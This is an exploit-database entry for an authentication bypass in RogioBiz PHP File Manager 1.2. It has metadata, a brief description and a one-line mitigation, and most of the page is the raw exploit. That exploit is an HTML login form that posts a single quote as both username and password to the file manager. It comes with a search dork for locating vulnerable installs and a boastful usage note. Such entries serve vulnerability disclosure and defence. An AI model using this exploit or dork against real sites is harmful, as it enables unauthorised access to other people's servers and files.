header-logo
Suggest Exploit
vendor:
RogioBiz PHP File Manager
by:
ItSecTeam
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: RogioBiz PHP File Manager
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:rogiobiz:rogiobiz_php_file_manager:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Bypass Admin Exploit

This exploit allows an attacker to bypass authentication by entering a single quote (') as the username and password. This is due to the lack of input validation in the login form of the RogioBiz_PHP_file_manager_V1.2 script. The script can be downloaded from http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip and can be found using the dork inurl:/rbfminc/.

Mitigation:

Input validation should be implemented to ensure that only valid usernames and passwords are accepted.
Source

Exploit-DB raw data:

#########################bypass admin exploit#################
Author: ItSecTeam

download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip

script:RogioBiz_PHP_file_manager_V1.2

dork:inurl:"/rbfminc/"

-----------------------------------------
use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.)

</html>
</style></head>
<h2>coded by ahmadbady</h2>
<body><br /><br /><br /><br />
<div class="login">
<div style="color:red" align="center"></div>
<form id="login_form" name="login_form" method="post" action="/path/file_manager.php">
<table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px">
<tr>
<td align="right">Username:</td>
<td><input type="text" name="username" id="username" value="'"
</tr>
<tr>
<td align="right">Password:</td>
<td><input type="password" name="password" id="password" value="'"
</td>
</tr>
<tr>
<td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login »" /></td>
</tr>
</table>
<input name="login" type="hidden" value="login" />
</form>
</div>
</body>
</html>

########################

discovered by ahmadbady

########################

Navigation

Suggest Exploit

Services By CQR